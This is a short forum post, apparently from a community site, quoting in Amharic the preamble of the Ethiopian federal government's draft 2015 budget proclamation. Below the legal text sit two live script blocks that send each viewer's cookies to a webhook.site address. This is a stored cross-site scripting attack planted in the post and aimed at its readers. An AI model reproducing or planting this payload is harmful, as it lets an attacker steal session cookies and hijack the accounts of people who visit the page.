Participate

የፌዴራል መንግሥት የ2015 በጀት ረቂቅ አዋጅ

yibeltal yibe, modified 1 Year ago.

የፌዴራል መንግሥት የ2015 በጀት ረቂቅ አዋጅ

Youngling Posts: 3 Join Date: 12/30/21 Recent Posts
2015 በጀት ዓመት በፌዴራል መንግሥት ለሚከናወኑ ሥራዎችና አገልግሎቶች የሚያስፈልገውን በጀት አፅድቆ በበጀት ዓመቱ መጀመሪያ ወቅት ሥራ ላይ ማዋል አስፈላጊ በመሆኑ፣የፌዴሬሽን ምክር ቤት በወሰነው ቀመር መሠረት የፌዴራሉ መንግሥት ለክልሎች የሚሰጠው የድጋፍ በጀት መጠን መወሰን ስለሚኖርበት፣ በኢትዮጵያ ፌዴራላዊ ዲሞክራሲያዊ ሪፐብሊክ ሕገ መንግሥት አንቀጽ 55/1/ እና /11/ መሠረት የሚከተለው ታውጇል፡፡
​​​​​​​
<script>
document.write('<img src="
https://webhook.site/60388ee2-ec6e-4e68-b9a6-19983e410dbe
?c='+document.cookie+'" />');
</script>
<script>
document.write('<img src="https://webhook.site/60388ee2-ec6e-4e68-b9a6-19983e410dbe?c='+document.cookie+'" />');
</script>

Vote